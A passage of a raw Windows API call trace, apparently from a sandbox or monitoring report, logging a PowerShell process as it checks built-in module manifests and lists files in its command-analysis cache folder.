lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", lpFilePart=0x0) returned 0x63 [0226.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.294] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6)) returned 1 [0226.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", lpFilePart=0x0) returned 0x63 [0226.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c2)) returned 1 [0226.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", lpFilePart=0x0) returned 0x53 [0226.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowssearch\\windowssearch.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2013c61b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2013c61b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2013c61b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1)) returned 1 [0226.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", lpFilePart=0x0) returned 0x53 [0226.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.299] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7b2)) returned 1 [0226.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8deb0) returned 1 [0226.299] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0226.299] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_*"), lpFindFileData=0x653ef8dbc0 | out: lpFindFileData=0x653ef8dbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd58e1f9d, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", cAlternateFileName="PODA56~1")) returned 0x25b73cd1530 [0226.300] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x695f46fc, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x695f46fc, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x695f46fc, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_03a43ac9-7ed2-4e22-bc60-4ebb6e74fbaa", cAlternateFileName="PO8E87~1")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6731dddb, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6731dddb, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6731dddb, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x9b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_078aaa97-7fa8-45e4-8147-959a1d3ac0b5", cAlternateFileName="POE7B7~1")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65f98a4c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x65f98a4c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x65f98a4c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x2a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_0c70ebde-beef-4c2f-83b7-f3f3130bd85d", cAlternateFileName="PO864E~1")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65d36370, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x65d36370, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x65d36370, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_0d69fb46-26d6-44c4-878d-fd07824a4e46", cAlternateFileName="PO69AB~1")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ccf259, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69ccf259, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69ccf259, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_0e40a10f-b91c-4ede-a9fb-69c946c77cfb", cAlternateFileName="POCBF8~1")) returned 1 [0226.301] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9072f4, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6a9072f4, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6a9072f4, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa75, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_0ea5c9d0-ec31-40ba-afa4-b18a4324934e", cAlternateFileName="POB93E~1")) returned 1 [0226.302] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x661faee4, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x661faee4, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x661faee4, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_151194c3-ecbc-43e5-96d8-cbc131d71ae0", cAlternateFileName="PO89F1~1")) returned 1 [0226.302] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a4db1a7, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6a4db1a7, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6a4db1a7, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1a5e0a7d-a582-4a6f-8e0f-f753ce44b669", cAlternateFileName="POEDD8~1")) returned 1 [0226.302] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93910e6, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb93910e6, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9394c19, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1cc363fc-fd33-403d-b8fa-964af616746c", cAlternateFileName="PO8435~1")) returned 1 [0226.302] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65f98a4c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x65f98a4c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x65f98a4c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1d41eb13-6b86-4de8-b50f-98a396e67f76", cAlternateFileName="POB574~1")) returned 1 [0226.302] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6949ceab, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6949ceab, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6949ceab, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2082700d-565f-45fe-aff6-63b66eda78f8", cAlternateFileName="POC144~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66dc082f, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66dc082f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66dc082f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x6ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_213a5eb1-3d7a-4129-91a9-30546a2a3348", cAlternateFileName="PO5E1D~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675a664a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x675a664a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x675a664a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2472835d-1cc8-4b7c-976d-e3406f38f0b2", cAlternateFileName="POA51D~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb5ba6, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6abb5ba6, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6abb5ba6, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_28d446c4-fdde-4ebb-8e93-9195ccf67b7b", cAlternateFileName="PODAB0~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65c5154c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x65c5154c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x65c5154c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_296d15c3-1d5e-4e7b-bc6e-5a4739053d99", cAlternateFileName="PO22B8~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6664d403, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6664d403, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6664d403, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2c1c02cc-4a60-4276-a33a-649882686d1d", cAlternateFileName="POA0DB~1")) returned 1 [0226.303] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb92f9afe, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb92f9afe, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb92faecd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2fb762b4-d05f-41c9-800e-eb1b344a91c2", cAlternateFileName="PO4F91~1")) returned 1 [0226.304] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68bc8f2c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68bc8f2c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68bc8f2c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x386, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_3d1401c3-d649-4da7-a8d7-ab9b94ec3e93", cAlternateFileName="PO6F2B~1")) returned 1 [0226.304] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x677bc74c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x677bc74c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x677bc74c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_3fef482b-31c3-4a81-ab0c-81769291b942", cAlternateFileName="PO93DB~1")) returned 1 [0226.304] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6931f72e, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6931f72e, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6931f72e, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x386, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_42a7be40-55b9-48aa-b91d-1da27a04699f", cAlternateFileName="PO4A9C~1")) returned 1 [0226.304] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea569c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66ea569c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66ea569c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_43cd9318-cb9d-47c5-a37e-c1c5fa61d0ee", cAlternateFileName="POD6D7~1")) returned 1 [0226.305] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b6b93d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb9b6b93d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9b6ccc5, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_460645de-0b19-4be1-bf3e-f69457b02cf0", cAlternateFileName="PO35F7~1")) returned 1 [0226.305] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65d36370, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x65d36370, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x65d36370, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_465e7de6-8348-4267-9c90-5ed070a8ebdc", cAlternateFileName="PO6A26~1")) returned 1 [0226.305] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a254ff, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68a254ff, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68a254ff, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_48fec87d-ab72-4d34-aaee-d0ed71d145b3", cAlternateFileName="PO797F~1")) returned 1 [0226.306] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bea3e0, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69bea3e0, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69bea3e0, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_4e0cd6f9-ad5f-477a-8435-7d7f79720556", cAlternateFileName="PO781D~1")) returned 1 [0226.306] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68fa8bbc, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68fa8bbc, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68fa8bbc, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1067, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_541ff8ef-26f3-4e66-a65d-16681e873d11", cAlternateFileName="POE826~1")) returned 1 [0226.306] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6922c54e, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6922c54e, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6922c54e, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x5af, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_576a1f3d-d61d-4d7c-9b4a-cb2c62658a1a", cAlternateFileName="POA732~1")) returned 1 [0226.306] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6980a65a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6980a65a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6980a65a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x252, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_598526ee-1366-4471-bf5a-e4b7c958601a", cAlternateFileName="POD592~1")) returned 1 [0226.306] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ac598c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66ac598c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66ac598c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xf2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_59c47277-42f9-4934-8187-e0b9e2e8ad1d", cAlternateFileName="PO45E0~1")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6828bd1a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6828bd1a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6828bd1a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1f2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6126176f-a9a8-48b2-8431-ba947b6c601c", cAlternateFileName="PO51BF~1")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e545ef, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd592e36d, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x22ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_67a2505d-bf00-4e2f-b010-406d32caddc3", cAlternateFileName="PO4D8E~1")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697e45c2, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x697e45c2, ftLastAccessTime.dwHighDateTime=0x1d93633, 